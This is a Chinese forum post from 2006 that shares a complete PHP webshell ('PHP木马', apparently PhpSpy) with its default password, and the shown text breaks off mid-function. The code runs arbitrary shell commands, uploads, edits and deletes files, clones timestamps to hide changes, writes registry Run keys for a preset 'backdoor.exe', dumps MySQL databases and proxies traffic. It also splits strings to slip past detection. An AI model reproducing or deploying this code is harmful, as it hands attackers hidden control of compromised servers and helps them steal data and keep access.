12
返回列表 回复 发帖
admin

信息军队-上尉
1#
打印
tT
发表于 2006-5-11 04:20 | 只看该作者

一款不错的PHP木马,我自己也在用!

这个PHP木马还不错的。我自己也在用。默认密码是 syue

<?php

error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];

/*===================== 程序配置 =====================*/

// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "1";

// 如果需要密码验证,请修改登陆密码
$admin['pass']  = "syue";

/*===================== 配置结束 =====================*/


// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {
 @extract($_POST, EXTR_SKIP);
 @extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");


/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
 if ($_GET['action'] == "logout") {
  setcookie ("adminpass", "");
  echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
  echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面 &gt;&gt;&gt;</a></span>";
  exit;
 }

 if ($_POST['do'] == 'login') {
  $thepass=trim($_POST['adminpass']);
  if ($admin['pass'] == $thepass) {
   setcookie ("adminpass",$thepass,time()+(1*24*3600));
   echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
   echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面 &gt;&gt;&gt;</a></span>";
   exit;
  }
 }
 if (isset($_COOKIE['adminpass'])) {
  if ($_COOKIE['adminpass'] != $admin['pass']) {
   loginpage();
  }
 } else {
  loginpage();
 }
}
/*===================== 验证结束 =====================*/

// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
 $_POST = stripslashes_array($_POST);
}

// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {
 echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
 exit;
}

// 在线代理
if (isset($_POST['url'])) {
 $proxycontents = @file_get_contents($_POST['url']);
 echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";
 exit;
}

// 下载文件
if (!empty($downfile)) {
 if (!@file_exists($downfile)) {
  echo "<script>alert('你要下的文件不存在!')</script>";
 } else {
  $filename = basename($downfile);
  $filename_info = explode('.', $filename);
  $fileext = $filename_info[count($filename_info)-1];
  header('Content-type: application/x-'.$fileext);
  header('Content-Disposition: attachment; filename='.$filename);
  header('Content-Description: PHP Generated Data');
  header('Content-Length: '.filesize($downfile));
  @readfile($downfile);
  exit;
 }
}

// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
 @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
 @mysql_select_db($dbname) or die("选择数据库失败"); 
 $table = array_flip($_POST['table']);
 $result = mysql_query("SHOW tables");
 echo ($result) ? NULL : "出错: ".mysql_error();

 $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
 header('Content-type: application/unknown');
 header('Content-Disposition: attachment; filename='.$filename);
 $mysqldata = '';
 while ($currow = mysql_fetch_array($result)) {
  if (isset($table[$currow[0]])) {
   $mysqldata.= sqldumptable($currow[0]);
   $mysqldata.= $mysqldata."\r\n";
  }
 }
 mysql_close();
 exit;
}

// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));

// 获取当前路径
if (!isset($dir) or empty($dir)) {
 $dir = ".";
 $nowpath = getPath($pathname, $dir);
} else {
 $dir=$_GET['dir'];
 $nowpath = getPath($pathname, $dir);
}

// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">注册表操作</a>" : "";

$tb = new FORMS;

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>岁月联盟 Www.SYue.Com</title>
<style type="text/css">
body,td {
 font-family: "Tahoma";
 font-size: "12px";
 line-height: "150%";
}
.smlfont {
 font-family: "Tahoma";
 font-size: "11px";
}
.INPUT {
 FONT-SIZE: "12px";
 COLOR: "#000000";
 BACKGROUND-COLOR: "#FFFFFF";
 height: "18px";
 border: "1px solid #666666";
 padding-left: "2px";
}
.redfont {
 COLOR: "#A60000";
}
a:link,a:visited,a:active {
 color: "#000000";
 text-decoration: underline;
}
a:hover {
 color: "#465584";
 text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
 for (var i=0;i<form.elements.length;i++) {
  var e = form.elements;
  if (e.name != 'chkall')
  e.checked = form.chkall.checked;
    }
}
function really(d,f,m,t) {
 if (confirm(m)) {
  if (t == 1) {
   window.location.href='?dir='+d+'&deldir='+f;
  } else {
   window.location.href='?dir='+d+'&delfile='+f;
  }
 }
}
</SCRIPT>
</head>

<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?action=logout">注销会话</a> | <a href="?action=dir">返回PhpSpy目录</a> | <a href="?action=phpenv">PHP环境变量</a> | <a href="?action=proxy">在线代理</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>程序路径: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->makeinput('dir').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗'));

$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));

$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit')));

$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if (!empty($delfile)) {
 if (file_exists($delfile)) {
  echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!";
 } else {
  echo basename($delfile)." 文件已不存在!";
 }
}

// 删除目录
elseif (!empty($deldir)) {
 $deldirs="$dir/$deldir";
 if (!file_exists("$deldirs")) {
  echo "$deldir 目录已不存在!";
 } else {
  echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!";
 }
}

// 创建目录
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
 if (!empty($newdirectory)) {
  $mkdirs="$dir/$newdirectory";
  if (file_exists("$mkdirs")) {
   echo "该目录已存在!";
  } else {
   echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!";
   @chmod("$mkdirs",0777);
  }
 }
}

// 上传文件
elseif ($doupfile) {
 echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!";
}

// 编辑文件
elseif ($_POST['do'] == 'doeditfile') {
 if (!empty($_POST['editfilename'])) {
  $filename="$editfilename";
  @$fp=fopen("$filename","w");
  echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
  @fclose($fp);
 } else {
  echo "请输入想要编辑的文件名!";
 }
}

// 编辑文件属性
elseif ($_POST['do'] == 'editfileperm') {
 if (!empty($_POST['fileperm'])) {
  $fileperm=base_convert($_POST['fileperm'],8,10);
  echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!";
  echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
 } else {
  echo "请输入想要设置的属性!";
 }
}

// 文件改名
elseif ($_POST['do'] == 'rename') {
 if (!empty($_POST['newname'])) {
  $newname=$_POST['dir']."/".$_POST['newname'];
  if (@file_exists($newname)) {
   echo "".$_POST['newname']." 已经存在,请重新输入一个!";
  } else {
   echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!";
  }
 } else {
  echo "请输入想要改的文件名!";
 }
}

// 克隆时间
elseif ($_POST['do'] == 'domodtime') {
 if (!@file_exists($_POST['curfile'])) {
  echo "要修改的文件不存在!";
 } else {
  if (!@file_exists($_POST['tarfile'])) {
   echo "要参照的文件不存在!";
  } else {
   $time=@filemtime($_POST['tarfile']);
   echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
  }
 }
}

// 自定义时间
elseif ($_POST['do'] == 'modmytime') {
 if (!@file_exists($_POST['curfile'])) {
  echo "要修改的文件不存在!";
 } else {
  $year=$_POST['year'];
  $month=$_POST['month'];
  $data=$_POST['data'];  
  $hour=$_POST['hour'];
  $minute=$_POST['minute'];
  $second=$_POST['second'];
  if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
   $time=strtotime("$data $month $year $hour:$minute:$second");
   echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
  }
 }
}

// 连接MYSQL
elseif ($connect) {
 if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
  echo "数据库连接成功!";
  mysql_close();
 } else {
  echo mysql_error();
 }
}

// 执行SQL语句
elseif ($_POST['do'] == 'query') {
 @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
 @mysql_select_db($dbname) or die("选择数据库失败");
 $result = @mysql_query($_POST['sql_query']);
 echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error();
 mysql_close();
}

// 备份操作
elseif ($_POST['do'] == 'backupmysql') {
 if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
  echo "请选择欲备份的数据表和备份方式!";
 } else {
  if ($_POST['backuptype'] == 'server') {
   @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
   @mysql_select_db($dbname) or die("选择数据库失败"); 
   $table = array_flip($_POST['table']);
   $filehandle = @fopen($path,"w");
   if ($filehandle) {
    $result = mysql_query("SHOW tables");
    echo ($result) ? NULL : "出错: ".mysql_error();
    while ($currow = mysql_fetch_array($result)) {
     if (isset($table[$currow[0]])) {
      sqldumptable($currow[0], $filehandle);
      fwrite($filehandle,"\n\n\n");
     }
    }
    fclose($filehandle);
    echo "数据库已成功备份到 <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
    mysql_close();
   } else {
    echo "备份失败,请确认目标文件夹是否具有可写权限!";
   }
  }
 }
}

// 打包下载 PS:文件太大可能非常慢
// Thx : 小花
elseif($downrar) {
 if (!empty($dl)) {
  $dfiles="";
  foreach ($dl AS $filepath=>$value) {
   $dfiles.=$filepath.",";
  }
  $dfiles=substr($dfiles,0,strlen($dfiles)-1);
  $dl=explode(",",$dfiles);
  $zip=new PHPZip($dl);
  $code=$zip->out;  
  header("Content-type: application/octet-stream");
  header("Accept-Ranges: bytes");
  header("Accept-Length: ".strlen($code));
  header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
  echo $code;
  exit;
 } else {
  echo "请选择要打包下载的文件!";
 }
}

// Shell.Application 运行程序
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
 $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
 $a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
 echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!";
}

// 查看PHP配置参数状况
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
 echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}

// 读取注册表
elseif(($regread) AND !empty($_POST['readregname'])) {
 $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
 var_dump(@$shell->RegRead($_POST['readregname']));
}

// 写入注册表
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
 $shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
 $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
 echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!";
}

// 删除注册表
elseif(($regdelete) AND !empty($_POST['delregname'])) {
 $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
 $a = @$shell->RegDelete($_POST['delregname']);
 echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!";
}

else {
 echo "本程序由 <a href=\"http://www.syue.com\" target=\"_blank\">Security Angel</a> 岁月联盟 [<a href=\"http://www.syue.com\" target=\"_blank\">SYUE</a>] 独立开发,可在 <a href=\"http://www.syue.com\" target=\"_blank\">www.syue.com</a> 下载最新版本.";
}

echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/

if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
 $tb->tableheader();
?>
  <tr bgcolor="#cccccc">
    <td align="center" nowrap width="27%"><b>文件</b></td>
 <td align="center" nowrap width="16%"><b>创建日期</b></td>
    <td align="center" nowrap width="16%"><b>最后修改</b></td>
    <td align="center" nowrap width="11%"><b>大小</b></td>
    <td align="center" nowrap width="6%"><b>属性</b></td>
    <td align="center" nowrap width="24%"><b>操作</b></td>
  </tr>
<?php
// 目录列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
 $filepath="$dir/$file";
 $a=@is_dir($filepath);
 if($a=="1"){
  if($file!=".." && $file!=".") {
   $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
   $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
   $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
   echo "<tr class=".getrowbg().">\n";
   echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
   echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
   echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
   echo "  <td align=\"center\" nowrap class=\"smlfont\">&lt;dir&gt;</td>\n";
   echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
   echo "  <td align=\"center\" nowrap><a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','你确定要删除 $file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!','1')\">删除</a></td>\n";
   echo "</tr>\n";
   $dir_i++;
  } else {
   if($file=="..") {
    echo "<tr class=".getrowbg().">\n";
    echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n";
    echo "</tr>\n";
   }
  }
 }
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
  <td colspan="6" height="5"></td>
</tr>
<FORM action="" method="POST">
<?
// 文件列表
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
 $filepath="$dir/$file";
 $a=@is_dir($filepath);
 if($a=="0"){  
  $size=@filesize($filepath);
  $size=$size/1024 ;
  $size= @number_format($size, 3);
  if (@filectime($filepath) == @filemtime($filepath)) {
   $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
   $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
  } else {
   $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
   $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
  }
  @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
  echo "<tr class=".getrowbg().">\n";
  echo "  <td style=\"padding-left: 5px;\">";
  echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
  echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
  echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
  echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
  echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
  echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
  echo "  <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','你确定要删除 $file 文件吗?','2')\">删除</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">时间</a></td>\n";
  echo "</tr>\n";
  $file_i++;
 }
}// while
@closedir($dirs);
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','选中文件打包下载','','submit').'</td><td align="right">'.$dir_i.' 个目录 / '.$file_i.' 个文件</td></tr></table>','center',getrowbg(),'','','6');

echo "</FORM>\n";
echo "</table>\n";
}// end dir

elseif ($_GET['action'] == "editfile") {
 if(empty($newfile)) {
  $filename="$dir/$editfile";
  $fp=@fopen($filename,"r");
  $contents=@fread($fp, filesize($filename));
  @fclose($fp);
  $contents=htmlspecialchars($contents);
 }else{
  $editfile=$newfile;
  $filename = "$dir/$editfile";
 }
 $action = "?dir=".urlencode($dir)."&editfile=".$editfile;
 $tb->tableheader();
 $tb->formheader($action,'新建/编辑文件');
 $tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件');
 $tb->tdbody($tb->maketextarea('filecontent',$contents));
 $tb->makehidden('do','doeditfile');
 $tb->formfooter('1','30');
}//end editfile

elseif ($_GET['action'] == "rename") {
 $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
 $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
 $tb->tableheader();
 $tb->formheader($action,'修改文件名');
 $tb->makehidden('oldname',$dir."/".$nowfile);
 $tb->makehidden('dir',$dir);
 $tb->tdbody('当前文件名: '.basename($nowfile));
 $tb->tdbody('改名为: '.$tb->makeinput('newname'));
 $tb->makehidden('do','rename');
 $tb->formfooter('1','30');
}//end rename

elseif ($_GET['action'] == "fileperm") {
 $action = "?dir=".urlencode($dir)."&file=".$file;
 $tb->tableheader();
 $tb->formheader($action,'修改文件属性');
 $tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
 $tb->makehidden('file',$file);
 $tb->makehidden('dir',urlencode($dir));
 $tb->makehidden('do','editfileperm');
 $tb->formfooter('1','30');
}//end fileperm

elseif ($_GET['action'] == "newtime") {
 $action = "?dir=".urlencode($dir);
 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
 $tb->tableheader();
 $tb->formheader($action,'克隆文件最后修改时间');
 $tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30');
 $tb->makehidden('do','domodtime');
 $tb->formfooter('','30');
 $tb->formheader($action,'自定义文件最后修改时间');
 $tb->tdbody('<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>','left');
 $tb->tdbody('当前文件名: '.$file);
 $tb->makehidden('curfile',$file);
 $tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
 $tb->makehidden('do','modmytime');
 $tb->formfooter('1','30');
}//end newtime

elseif ($_GET['action'] == "shell") {
 $action = "??action=shell&dir=".urlencode($dir);
 $tb->tableheader();
 $tb->tdheader('WebShell Mode');

 if (substr(PHP_OS, 0, 3) == 'WIN') {
  $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
  $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
  echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
  $tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
  $tb->makehidden('do','programrun');
  echo "</form>\n";
 }

 echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
 $tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.');
 
 $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');

 $tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
  <tr class="secondalt">
    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
 if (!empty($_POST['command'])) {
  if ($execfunc=="system") {
   system($_POST['command']);
  } elseif ($execfunc=="passthru") {
   passthru($_POST['command']);
  } elseif ($execfunc=="exec") {
   $result = exec($_POST['command']);
   echo $result;
  } elseif ($execfunc=="shell_exec") {
   $result=shell_exec($_POST['command']);
   echo $result; 
  } elseif ($execfunc=="popen") {
   $pp = popen($_POST['command'], 'r');
   $read = fread($pp, 2096);
   echo $read;
   pclose($pp);
  } elseif ($execfunc=="wscript") {
   $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
   $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
   $stdout = $exec->StdOut();
   $stroutput = $stdout->ReadAll();
   echo $stroutput;
  } else {
   system($_POST['command']);
  }
 }
 ?></textarea></td>
  </tr> 
  </form>
</table>
<?php
}//end shell

elseif ($_GET['action'] == "reg") {
 $action = '?action=reg';
 $regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
 $registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
 $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
 $delregname = $_POST['delregname'];
 $tb->tableheader();
 $tb->formheader($action,'读取注册表');
 $tb->tdbody('键值: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','读取','','submit'),'center','2','50');
 echo "</form>";

 $tb->formheader($action,'写入注册表');
 $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
 $tb->tdbody('键值: '.$tb->makeinput('writeregname',$registre,'','text','56').' 类型: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' 值:  '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','写入','','submit'),'center','2','50');
 echo "</form>";

 $tb->formheader($action,'删除注册表');
 $tb->tdbody('键值: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','删除','','submit'),'center','2','50');
 echo "</form>";
 $tb->tablefooter();
}//end reg

elseif ($_GET['action'] == "proxy") {
 $action = '?action=proxy';
 $tb->tableheader();
 $tb->formheader($action,'在线代理','proxyframe');
 $tb->tdbody('<br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : '.$_SERVER['REMOTE_ADDR'].'</li></ul>','left');
 $tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','浏览','','submit'),'center','1','40');
 $tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="http://www.4ngel.net"></iframe>');
 echo "</form>";
 $tb->tablefooter();
}//end proxy

elseif ($_GET['action'] == "sql") {
 $action = '?action=sql';
 $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
 $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
 $dbpassword = $_POST['dbpassword'];
 $dbname = $_POST['dbname'];
 $sql_query = $_POST['sql_query'];
 $tb->tableheader();
 $tb->formheader($action,'执行 SQL 语句');
 $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
 $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
 $tb->makehidden('do','query');
 $tb->formfooter('1','30');
}//end sql query

elseif ($_GET['action'] == "sqlbak") {
 $action = '?action=sqlbak';
 $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
 $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
 $dbpassword = $_POST['dbpassword'];
 $dbname = $_POST['dbname'];
 $tb->tableheader();
 $tb->formheader($action,'备份 MySQL 数据库');
 $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
 @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
    $tables = @mysql_list_tables($dbname);
    while ($table = @mysql_fetch_row($tables)) {
  $cachetables[$table[0]] = $table[0];
    }
    @mysql_free_result($tables);
 if (empty($cachetables)) {
  $tb->tdbody('<b>您没有连接数据库 or 当前数据库没有任何数据表</b>');
 } else {
  $tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">请选择表:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> 备份数据所保存的路径:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> 直接下载到本地 (适合数据量较小的数据库)</td></tr></table>');
  $tb->makehidden('do','backupmysql');
  $tb->formfooter('0','30');
 }
 $tb->tablefooter();
 @mysql_close();
}//end sql backup

elseif ($_GET['action'] == "phpenv") {
 $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
